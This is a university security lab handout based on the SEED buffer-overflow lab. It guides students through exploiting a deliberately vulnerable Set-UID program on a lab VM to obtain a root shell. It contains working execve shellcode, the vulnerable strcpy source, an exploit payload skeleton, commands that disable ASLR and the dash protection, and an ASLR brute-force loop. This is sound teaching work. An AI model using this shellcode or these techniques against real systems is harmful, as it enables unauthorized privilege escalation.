Important
If you shut down your VM, you will need to turn off address space randomization again the next time you start the VM.
This lab is designed to give you hands-on experience working with buffer-overflow vulnerabilities.
A buffer overflow is defined as the condition in which a program attempts to write data beyond the boundaries of pre-allocated fixed length buffers. A malicious user can utilize this type of vulnerability to alter the control flow of the program, and even to execute arbitrary pieces of code. This type of vulnerability arises due to the mixing of the storage for data (e.g. buffers) and the storage for controls (e.g. return addresses): an overflow in the data part can affect the control flow of the program, because an overflow can change the return address.
In this lab you will be given a program with a buffer overflow vulnerability. Your task is to exploit the vulnerability and gain root privilege on the system. In addition, you will work with several protection systems that have been designed to prevent buffer overflow attacks. You will be evaluating why these systems work, and how well they work.
This lab requires familiarity with gcc and gdb. If you are uncomfortable with these tools, please reach out to the TAs on Piazza.
You should also review the lab videos and the simplified buffer overflow example video which is available here.
You must read this entire document, and watch the videos before asking for help on this lab. If you have not done so, you will be directed to do that before help is offered.
All work for this lab will be done on the lab VMs.
Please be sure to take a snapshot of your VM before starting this lab.
If you are using the online VMs please follow these directions. Note: Do NOT take a snapshot of the virtual machine's memory. This will cause massive slowdowns in later labs.
If you are using VirtualBox please look at steps 40 onward in @50, or follow these directions
In your VM, download and extract the lab setup files for this lab from the SEED website. This will be the buffer overflow attack lab (set-uid version). https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Labsetup.zip
Optionally, you can use wget from the terminal inside the VM.
$ wget https://seedsecuritylabs.org/Labs_20.04/Files/Buffer_Overflow_Setuid/Labsetup.zip
The lab VM runs Ubuntu 20.04. Ubuntu (and most other Linux distributions) implements several security mechanisms to prevent buffer overflow attacks. To make our attacks easier, we need to disable them. Later in the lab, we will re-enable the protections to see if our attacks are still successful.
One of the critical steps of a buffer overflow attack is guessing the addresses of the heap and stack. Linux-based systems use address space randomization to randomize the starting address of the heap and stack. This makes guessing the exact addresses difficult. Address space randomization can be disabled with the following command:
$ sudo sysctl -w kernel.randomize_va_space=0
It's never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to break down what the commands do.
sudo means "run the following command as a superuser". The following command will run with a higher set of privileges than the normal user account (like an administrator on Windows systems).
sysctl is a command used to edit the kernel (core system) settings.
-w is a flag (or modifier) to the command. Here, it tells the sysctl command that we want to write (or update) a value.
kernel.randomize_va_space=0 sets the value of the randomize address space setting to 0 (or false).
You can check out this link for more information on kernel settings.
If you shut down your VM, you will need to turn off address space randomization again the next time you start the VM.
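Because the setting resets on reboot, it can help to confirm its current value before each session. The sketch below is one possible way to do that, assuming the standard /proc/sys/kernel/randomize_va_space file that backs the sysctl setting; the helper name describe_aslr is made up for this illustration.

```python
from pathlib import Path

ASLR_FILE = Path("/proc/sys/kernel/randomize_va_space")

def describe_aslr(raw: str) -> str:
    """Hypothetical helper: turn the raw sysctl value into a short description."""
    value = int(raw.strip())
    meanings = {
        0: "off (what the first part of this lab needs)",
        1: "on: mmap base, stack and VDSO page randomized",
        2: "on: mmap base, stack, VDSO page and heap randomized",
    }
    return meanings.get(value, "unknown value")

# Only read the file when it exists, so the sketch also runs on non-Linux hosts.
if ASLR_FILE.exists():
    print("kernel.randomize_va_space:", describe_aslr(ASLR_FILE.read_text()))
```

If the output does not say "off", rerun the sysctl command above before continuing.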
The dash shell in Ubuntu 20.04 has a countermeasure that prevents itself from being executed in a Set-UID process. If dash detects that it is executed in a Set-UID process, it immediately changes the effective user ID to the process's real user ID, essentially dropping the privilege. Since the vulnerable program we are attacking makes use of Set-UID privileges, this is an issue.
This attack relies on running /bin/sh, which is linked to the dash shell. Instead, we can point /bin/sh at a shell that doesn't have the same countermeasure. One such shell is zsh, which is already installed on the VM.
$ sudo rm /bin/sh
$ sudo ln -sf /bin/zsh /bin/sh
It's never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to break down what the commands do.
sudo means "run the following command as a superuser". The following command will run with a higher set of privileges than the normal user account (like an administrator on Windows systems).
rm is the remove command. It deletes files.
/bin/sh is the file we want to delete. It currently links to the wrong shell.
The second command makes /bin/sh a symbolic link to /bin/zsh (-s creates a symbolic link, -f replaces any existing file). This way, when our program executes /bin/sh, it will actually call the zsh shell.
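To confirm that the link now points where you expect, you can resolve it. This is a small sketch using only the Python standard library; shell_target is a hypothetical helper name, and the result depends on your own VM.

```python
import os

def shell_target(path: str = "/bin/sh") -> str:
    """Hypothetical helper: follow symbolic links and return the final path."""
    return os.path.realpath(path)

# On the lab VM this is expected to end in "zsh" after the two commands above;
# on other systems it may resolve to dash, bash, or something else.
print(shell_target())
```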
The ultimate goal of buffer-overflow attacks is to inject malicious code into the target program, so the code can be executed using the target program's privilege. This malicious code is called shellcode, because it typically starts a command shell, from where the hacker can control the machine.
Our shellcode for this attack is going to call the /bin/sh shell. If we were to implement similar code in a high-level programming language (C), it would look like this:
#include <stdio.h>
#include <unistd.h>   /* declares execve() */
int main() {
    char *name[2];
    name[0] = "/bin/sh";
    name[1] = NULL;
    execve(name[0], name, NULL);
    return 1;   /* reached only if execve() fails */
}
Unfortunately, we can't just compile this code and use the binary code as our shellcode. The best way to write shellcode is to use assembly code. In this lab, only a binary version of the shellcode is provided, without explaining exactly how it works (it is non-trivial). If you are interested in how exactly shellcode works and you want to write shellcode from scratch, you can learn that from a separate SEED lab called Shellcode Lab. (Note: you may also ask the TAs to review this shellcode with you.)
A naive thought is to compile the above code into binary, and then save it to the input file badfile. We then set the targeted return address field to the address of the main() function, so when the vulnerable program returns, it jumps to the entrance of the above code. Unfortunately this does not work for several reasons.
Before a normal program runs, it needs to be loaded into memory and its running environment needs to be set up. These jobs are conducted by the OS loader, which is responsible for setting up the memory (such as stack and heap), copying the program into memory, invoking the dynamic linker to link to the needed library functions, etc. After all the initialization is done, the main() function will be triggered. If any of the steps is missing, the program will not be able to run correctly. In a buffer overflow attack, the malicious code is not loaded by the OS; it is loaded directly via memory copy. Therefore, all the essential initialization steps are missing; even if we can jump to the main() function, we will not be able to get the shell program to run.
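String copying (e.g. using strcpy()) will stop when a zero is found in the source string. When we compile the above C code into binary, at least three zeros will exist in the binary code: the '\0' terminator at the end of the "/bin/sh" string and the two NULL values.
The 32-bit shellcode, written in assembly to avoid these problems, is shown below: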
; Store the command on stack
xor eax, eax
push eax
push "//sh"
push "/bin"
mov ebx, esp ; ebx --> "/bin//sh": execve()'s 1st argument
; Construct the argument array argv[]
push eax ; argv[1] = 0
push ebx ; argv[0] --> "/bin//sh"
mov ecx, esp ; ecx --> argv[]: execve()'s 2nd argument
; For environment variable
xor edx, edx ; edx = 0: execve()'s 3rd argument
; Invoke execve()
xor eax, eax ;
mov al, 0x0b ; execve()'s system call number
int 0x80
This shellcode is sparsely commented, but the comments should be enough to give you a high-level overview of what is happening. Simply put, we are invoking the execve() system call to execute /bin/sh. Some things to note:
The third instruction pushes //sh, rather than /sh, onto the stack. This is because we need a 32-bit number here, and /sh has only 24 bits. Fortunately, // is equivalent to /, so we can get away with a double slash symbol.
We need to pass three arguments to execve() via the ebx, ecx and edx registers, respectively. The majority of the shellcode basically constructs the content for these three arguments.
The system call execve() is called when we set al to 0x0b and execute int 0x80.
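The point about //sh being a 32-bit number can be checked directly. The sketch below treats each four-character chunk as the little-endian value a 32-bit push would take; push_immediate is a hypothetical helper written for this illustration, not part of the lab files.

```python
def push_immediate(chunk: bytes) -> int:
    """Hypothetical helper: the 32-bit little-endian value for a 4-byte chunk."""
    if len(chunk) != 4:
        raise ValueError("a 32-bit push needs exactly 4 bytes")
    return int.from_bytes(chunk, byteorder="little")

print(hex(push_immediate(b"//sh")))  # 0x68732f2f
print(hex(push_immediate(b"/bin")))  # 0x6e69622f
print(len(b"/sh") * 8)               # 24 bits, one byte short of a full push
```

Read byte by byte in memory order, these values are the 2f 2f 73 68 and 2f 62 69 6e sequences that follow each 0x68 (push) opcode in the 32-bit bytecode listed in call_shellcode.c.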
The 64-bit shellcode is provided below. It's very similar to the 32-bit shellcode, but some of the registers are different. Like above, you don't need to fully understand what it does, but a high-level overview is provided in the comments.
xor rdx, rdx ; rdx = 0: execve()'s 3rd argument
push rdx
mov rax, '/bin//sh' ; the command we want to run
push rax ;
mov rdi, rsp ; rdi --> "/bin//sh": execve()'s 1st arg
push rdx ; argv[1] = 0
push rdi ; argv[0] --> "/bin//sh"
mov rsi, rsp ; rsi --> argv[]: execve()'s 2nd argument
xor rax, rax
mov al, 0x3b ; execve()'s system call number
syscall
This lab provides you with the generated binary code from the assembly code above. The code can be found in a C program called call_shellcode.c inside the shellcode folder.
This code is provided to you so that you can ensure that the shellcode provides an actual shell. It may come in handy during the debugging process.
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
const char shellcode[] =
#if __x86_64__
"\x48\x31\xd2\x52\x48\xb8\x2f\x62\x69\x6e"
"\x2f\x2f\x73\x68\x50\x48\x89\xe7\x52\x57"
"\x48\x89\xe6\x48\x31\xc0\xb0\x3b\x0f\x05"
#else
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
"\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
"\xd2\x31\xc0\xb0\x0b\xcd\x80"
#endif
;
int main(int argc, char **argv) {
    char code[500];
    strcpy(code, shellcode); // Copy the shellcode to the stack
    int (*func)() = (int(*)())code;
    func(); // Invoke the shellcode from the stack
    return 1;
}
The code above includes two copies of the shellcode: one is 32-bit and the other is 64-bit. When we compile the program using the -m32 flag, the 32-bit version will be used; without this flag, the 64-bit version will be used. Using the provided Makefile, you can compile the code by typing make. Two binaries will be created, a32.out (32-bit) and a64.out (64-bit). It should be noted that the compilation uses the execstack option, which allows code to be executed from the stack; without this option, the program will fail.
You can run the resulting programs to ensure that they work correctly and give you a shell.
You will need to copy and paste this bytecode into your attacking program.
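Before pasting the bytecode anywhere, it is worth checking that it contains no zero bytes, since strcpy() would stop at the first one. The following is a minimal sketch using the 32-bit bytes from call_shellcode.c; strcpy_model is a hypothetical stand-in that only imitates where strcpy() stops copying.

```python
# 32-bit shellcode bytes, copied from call_shellcode.c above.
shellcode32 = (
    "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f"
    "\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31"
    "\xd2\x31\xc0\xb0\x0b\xcd\x80"
).encode("latin-1")

def strcpy_model(src: bytes) -> bytes:
    """Hypothetical helper: the bytes strcpy() would copy (everything before the first zero)."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]

print(len(shellcode32))                           # 27
print(0 in shellcode32)                           # False: no zero bytes
print(strcpy_model(shellcode32) == shellcode32)   # True: copied in full
print(strcpy_model(b"AB\x00CD"))                  # b'AB': copy stops at the zero
```

The latin-1 encoding maps each character \x00 to \xff to the single byte with the same value, which is why exploit.py uses it.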
The vulnerable program used in this lab is called stack.c. This program has a buffer-overflow vulnerability; your task is to exploit this vulnerability and gain root privilege. The code listed below has some non-essential information removed, so it is slightly different from what is provided in the lab setup files.
/* stack.c */
/* This program has a buffer overflow vulnerability. */
/* Our task is to exploit this vulnerability */
#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#ifndef BUF_SIZE
#define BUF_SIZE 100
#endif
int bof(char *input_array)
{
    char vulnerable_buffer[BUF_SIZE];
    /* The following statement has a buffer overflow problem */
    strcpy(vulnerable_buffer, input_array);
    return 1;
}
int main(int argc, char **argv)
{
    char input_array[517];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(input_array, sizeof(char), 517, badfile);
    bof(input_array);
    printf("Returned Properly\n");
    return 1;
}
This program first reads an input from a file called badfile, and then passes this input to another buffer in the function bof(). The original input can have a maximum length of 517 bytes, but the buffer in bof() is only BUF_SIZE bytes long, which is less than 517. Because strcpy() does not check boundaries, a buffer overflow will occur. Since this program is a root-owned Set-UID program, if a normal user can exploit this buffer overflow vulnerability, the user might be able to get a root shell.
This program gets its input from a file called "badfile". The user is able to write to and modify this file. The primary objective of this lab is to create the contents for badfile, such that when the vulnerable program copies the contents into its buffer, a root shell can be spawned.
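To make the overflow concrete, here is a toy model of the stack frame of bof() in Python. It assumes a simplified 32-bit layout (buffer, then saved frame pointer, then return address, with no padding) and uses made-up addresses; real frames on your VM will differ, and the model ignores the terminating zero that strcpy() also writes.

```python
BUF_SIZE = 100  # default value in the stack.c listing

# Toy frame: buffer | saved frame pointer | return address (all values hypothetical).
frame = (
    bytearray(BUF_SIZE)
    + (0xffffd0e8).to_bytes(4, "little")
    + (0x565562e0).to_bytes(4, "little")
)

def unchecked_copy(dst: bytearray, src: bytes) -> None:
    """Copy src up to its first zero byte without checking the buffer size."""
    end = src.find(b"\x00")
    data = src if end == -1 else src[:end]
    dst[:len(data)] = data  # runs past BUF_SIZE when data is long enough

unchecked_copy(frame, b"A" * (BUF_SIZE + 8))
ret = int.from_bytes(frame[BUF_SIZE + 4:BUF_SIZE + 8], "little")
print(hex(ret))  # 0x41414141: the return address was overwritten
```

In the real attack the overwritten value is not 0x41414141 but an address chosen by the attacker, which is what the rest of the lab is about.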
The easiest way to compile this program is to use the included Makefile. Just type make in the target directory and the required program will be compiled. The variables L1, ..., L4 are set in the Makefile and are used during compilation.
You will need to edit the Makefile to set the values to the following:
L1: 150
L2: 200
L3: 300
L4: 10
To compile the vulnerable program, you need to turn off the StackGuard and the non-executable stack protections using the -fno-stack-protector and -z execstack options. After the compilation, we need to make the program a root-owned Set-UID program. We can achieve this by first changing the ownership of the program to root:
sudo chown root stack
and then changing the permissions to enable the Set-UID bit:
sudo chmod 4755 stack
You need to change ownership before turning on the Set-UID bit, otherwise the ownership change will cause the Set-UID bit to be turned off.
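The mode 4755 packs the Set-UID bit together with the usual rwxr-xr-x permissions. As a quick illustration using Python's standard stat module:

```python
import stat

mode = 0o4755  # the octal mode passed to chmod above

print(bool(mode & stat.S_ISUID))           # True: the leading 4 is the Set-UID bit
print(oct(mode & 0o777))                   # 0o755: rwx for owner, r-x for group and others
print(stat.filemode(stat.S_IFREG | mode))  # -rwsr-xr-x, as ls -l would show it
```

The s in the owner's execute position is what you should see in ls -l stack once both commands have run.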
To exploit the buffer overflow vulnerability in the target program, the most important thing to know is the distance between the buffer's starting position and the place where the return address is stored. We can use a debugger to find these values. Since we have the source code of the target program, we can compile it with the debugging flag turned on. That will make it more convenient to debug. If you used make to compile the code, then you should already have a stack-L1-dbg executable file.
Before you begin, make sure you create the badfile.
Note: the $ indicates the shell prompt, and gdb-peda$ indicates the prompt inside gdb. The text after // is a comment and should not be typed in; it is included for your understanding.
$ touch badfile // This will create an empty badfile.
$ gdb stack-L1-dbg
gdb-peda$ b bof // Set a breakpoint at the start of the bof function.
gdb-peda$ run
gdb-peda$ next // See below for why we have to do this.
gdb-peda$ p $ebp // Get the value of the ebp register.
gdb-peda$ p &buffer // Print the address of the buffer (named buffer in the lab setup files).
gdb-peda$ quit
Why next? When gdb stops inside the bof() function, it stops before the ebp register is set to point to the current stack frame, so if we print out the value of ebp here, we will get the caller's ebp value. We need to use next to execute a few instructions and stop after the ebp register is modified to point to the stack frame of the bof() function.
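The two values printed by gdb give the distance discussed above. The arithmetic can be sketched as follows, assuming the usual 32-bit x86 frame layout in which the saved frame pointer sits at ebp and the return address sits in the 4 bytes directly above it. The addresses are made up for illustration; use the ones gdb prints on your own VM.

```python
# Hypothetical values; replace with your own gdb output.
ebp = 0xffffcb18          # from: p $ebp
buffer_addr = 0xffffcaac  # from: p &buffer

distance_to_ebp = ebp - buffer_addr
return_addr_offset = distance_to_ebp + 4  # skip the 4-byte saved frame pointer

print(distance_to_ebp)     # 108
print(return_addr_offset)  # 112
```

Keep in mind that addresses seen inside gdb can differ slightly from those in a normal run, because gdb changes the environment the program starts with.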
To exploit the buffer-overflow vulnerability in the target program, we need to prepare a payload and save it inside badfile. We will use a Python script to help us with this. A skeleton script called exploit.py is provided for you. You will need to make some changes for it to work correctly.
#!/usr/bin/python3
import sys
shellcode= ( "" #CHANGE THIS! You can get the correct bytecode from the earlier files
).encode('latin-1')
# Fill the content with NOP's
content = bytearray(0x90 for i in range(517))
################################################################
# Put the shellcode somewhere in the payload
start = 0 # ✩ Need to change ✩
content[start:start + len(shellcode)] = shellcode
# Decide the return address value
# and put it somewhere in the payload
ret = 0x00 #CHANGE THIS!
offset = 0 #CHANGE THIS!
L = 4 # Use 4 for 32-bit address and 8 for 64-bit address
content[offset:offset + L] = (ret).to_bytes(L,byteorder='little')
################################################################
# Write the content to a file
with open('badfile', 'wb') as f:
    f.write(content)
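The to_bytes() call in the skeleton is what turns the return address into bytes in the order the CPU expects. The short sketch below shows its effect in isolation; the values of ret and offset are placeholders chosen for illustration, not values to reuse in your attack.

```python
ret = 0xffffcb88   # hypothetical address
offset = 112       # hypothetical position of the return address in the payload
L = 4              # 4 bytes for a 32-bit address

packed = ret.to_bytes(L, byteorder='little')
print(packed.hex())  # 88cbffff: least significant byte first

content = bytearray(0x90 for i in range(517))
content[offset:offset + L] = packed
print(len(content))                        # 517: the payload size is unchanged
print(content[offset:offset + L].hex())    # 88cbffff
```

Because the slice being replaced has the same length as packed, the payload stays at 517 bytes, matching what stack.c reads from badfile.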
In your lab report, in addition to providing screenshots to demonstrate your investigation and attack, you also need to explain how the values used in your exploit.py are decided. These values are the most important part of the attack, so a detailed explanation can help when grading your report. Only demonstrating a successful attack without explaining why the attack works will not receive any points.
Submit, along with your lab report, the completed exploit.py program, and the “badfile” you produced. In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
content = bytearray(0x90 for i in range(517))
stack.c
were 50
characters rather than 500.
In the Level-1 attack we used gdb to calculate the size of the buffer. In the real world, this piece of information may be hard to get. For example, if the target is a server program running on a remote machine, we will not be able to get a copy of the binary or source code. In this task, we are going to add a constraint: you can still use gdb, but you are not allowed to derive the buffer size from your investigation. Additionally, the buffer size is provided in Makefile, but you are not allowed to use that information in your attack. Your task is to get the vulnerable program to run your shellcode under this constraint.
You know that the buffer size is between 100 and 200 bytes. You also know that, due to memory alignment, the value stored in the frame pointer is always a multiple of four (for 32-bit programs).
You are only allowed to construct one payload that works for any buffer size within this range. You will not get full credit if you use the brute-force method, i.e., trying one buffer size each time. You should minimize the number of times you need to run exploit.py. The more attempts you make, the easier it is for the target to detect and stop the attack. In your lab report, you need to describe your method and provide evidence of success.
Submit, along with your lab report, the completed exploit.py program (named exploitL2.py). In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
In this task, you will be attacking a 64-bit program called stack-L3. Using gdb to conduct an investigation on 64-bit programs is the same as that on 32-bit programs. The only difference is the name of the register for the frame pointer. In the x86 architecture (32-bit programs), the frame pointer is ebp, while in the x64 architecture, it is rbp. Similar to the previous task, a detailed explanation of your attack needs to be provided in the lab report.
Compared to buffer-overflow attacks on 32-bit machines, attacks on 64-bit machines are more difficult because of the addressing. Although the x64 architecture supports a 64-bit address space, only addresses from 0x00 through 0x00007FFFFFFFFFFF are allowed. That means for every address (8 bytes), the highest two bytes are always zeros. This causes a problem. In our buffer-overflow attacks, we need to store at least one address in the payload, and the payload will be copied into the stack via strcpy(). We know that the strcpy() function will stop copying when it sees a zero. Therefore, if a zero appears in the middle of the payload, the content after the zero cannot be copied into the stack. How to solve this problem is the most difficult challenge in this attack.
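The effect of those two zero bytes can be seen by packing a 64-bit address the same way exploit.py does. This is only an illustration of the problem, with a made-up address and a hypothetical strcpy_model helper that imitates where strcpy() stops; it does not show how to solve it.

```python
def strcpy_model(src: bytes) -> bytes:
    """Hypothetical helper: the bytes strcpy() would copy (everything before the first zero)."""
    end = src.find(b"\x00")
    return src if end == -1 else src[:end]

addr = 0x00007fffffffe1a0  # hypothetical user-space stack address
packed = addr.to_bytes(8, byteorder="little")
print(packed.hex())            # a0e1ffffff7f0000
print(packed.find(b"\x00"))    # 6: the zeros are the last two bytes in memory order

payload = b"A" * 16 + packed + b"B" * 8
print(len(strcpy_model(payload)))  # 22: nothing after the address is copied
```

In little-endian order the zero bytes come last, so everything up to and including the six non-zero address bytes is copied, and everything after is lost.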
Submit, along with your lab report, the completed exploit.py program (named exploitL3.py). In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
This step is extra credit. It is quite challenging!
The target program (stack-L4) in this task is similar to the one in Level 3, except that the buffer size is extremely small. The buffer size is set to 10, while in Level 3, the buffer size is much larger. Your goal is the same: get the root shell by attacking this program. You may encounter additional challenges in this attack due to the small buffer size. If that is the case, you need to explain how you have solved those challenges in your attack.
Submit, along with your lab report, the completed exploit.py program (named exploitL4.py). In order to obtain full credit, this program must help correctly obtain root privilege when executed as outlined. In your lab report, include the following:
On 32-bit Linux machines, stacks only have 19 bits of entropy, which means the stack base address can have 2^19 = 524,288 possibilities. This number is not that high and can be exhausted easily with the brute-force approach. In this task, you will use such an approach to defeat the address randomization countermeasure on a 32-bit system.
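To get a feel for what 19 bits of entropy means for a brute-force attack, the sketch below works through the numbers under a simplifying assumption: each run picks one of the 2^19 base addresses uniformly and independently, and exactly one of them makes the attack succeed. Real odds on your VM may differ from this model.

```python
bits = 19
possibilities = 2 ** bits
print(possibilities)  # 524288

# Simplifying assumption: one success chance in `possibilities` per run.
p = 1 / possibilities

def chance_within(runs: int) -> float:
    """Probability of at least one success in the given number of independent runs."""
    return 1 - (1 - p) ** runs

print(round(chance_within(possibilities), 3))      # 0.632
print(round(chance_within(3 * possibilities), 3))  # 0.95
```

Under this model the number of runs needed varies widely from one attempt to the next, which is why the time the attack takes can range from minutes to much longer.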
First, turn Ubuntu's address space randomization back on:
$ sudo /sbin/sysctl -w kernel.randomize_va_space=2
It's never a good idea to run commands blindly without understanding what they do. You can use a website like explainshell.com to break down what the commands do.
sudo means "run the following command as a superuser". The following command will run with a higher set of privileges than the normal user account (like an administrator on Windows systems).
sysctl is a command used to edit the kernel (core system) settings.
-w is a flag (or modifier) to the command. Here, it tells the sysctl command that we want to write (or update) a value.
kernel.randomize_va_space=2 sets the value of the randomize address space setting to 2 (enable mmap base, stack, VDSO page, and heap randomization).
You can check out this link for more information on kernel settings.
We can then use the brute-force approach to attack the vulnerable program repeatedly, hoping that the address we put in the badfile will eventually be correct. We will only try this on stack-L1, which is a 32-bit program. You can use the following shell script to run the vulnerable program in an infinite loop. If your attack succeeds, the script will stop; otherwise, it will keep running. Please be patient, as this may take a few minutes, but if you are very unlucky, it may take longer.
#!/bin/bash
SECONDS=0
value=0
while true; do
    value=$(( $value + 1 ))
    duration=$SECONDS
    min=$(($duration / 60))
    sec=$(($duration % 60))
    echo "$min minutes and $sec seconds elapsed."
    echo "The program has been running $value times so far."
    ./stack-L1
done
Brute-force attacks on 64-bit programs are much harder, because the entropy is much larger. Although this is not required, feel free to try it just for fun. Let it run overnight. Who knows, you might get very lucky.
In your lab report, include the following:
Before working on this task, remember to turn off the address randomization first (instructions are provided in section 2), or you will not know which safeguard helps achieve the protection.
In our previous tasks, we disabled the “Stack Guard” protection mechanism in GCC when compiling the programs. In this task, you may consider repeating task 1 in the presence of Stack Guard. To do that, you should compile the program without the -fno-stack-protector option. For this task, you will recompile the vulnerable program, stack.c, to use GCC's Stack Guard, execute task 1 again, and report your observations.
You may report any error messages you observe.
In your lab report, include the following:
Before working on this task, remember to turn off the address randomization first (instructions are provided in section 2), or you will not know which safeguard helps achieve the protection.
In our previous tasks, we intentionally made stacks executable. In this task, we recompile our vulnerable program using the noexecstack option, and repeat the attack in Task 1. Can you get a shell? If not, what is the problem? How does this protection scheme make your attack difficult? You should describe your observations and explanations in your lab report.
It should be noted that a non-executable stack only makes it impossible to run shellcode on the stack; it does not prevent buffer-overflow attacks, because there are other ways to run malicious code after exploiting a buffer-overflow vulnerability. The return-to-libc attack is an example. There is a separate SEED lab for that, and example vulnerable programs can be found online if you are interested.
Whether the non-executable stack protection works or not depends on the CPU and the setting of your virtual machine, because this protection depends on a hardware feature that is provided by the CPU. If you find that the non-executable stack protection does not work, you may need to do some manual troubleshooting.
In your lab report, include the following:
noexecstack option, and the results of a single run of the program with that protection active.
You will need to submit a written lab report through UBLearns, containing all of the deliverable elements above, by the due date specified in UBLearns. You are encouraged to explore beyond what is required by the lab.
Deliverables | Points |
---|---|
Working L1 program obtaining root shell | 10 |
5.2.1 | 1 |
5.2.2 | 3 |
5.2.3 | 3 |
5.2.4 | 3 |
6.1 | 3 |
6.2 | 3 |
7.1 | 3 |
7.2 | 3 |
8.1 | Extra Credit - 5 |
8.2 | Extra Credit - 5 |
9.1 | 1 |
9.2 | 3 |
9.3 | 3 |
9.4 | 3 |
9.5 | 1 |
10.1 | 1 |
10.2 | 3 |
10.3 | 3 |
11.1 | 1 |
11.2 | 3 |
Total | 54(64) |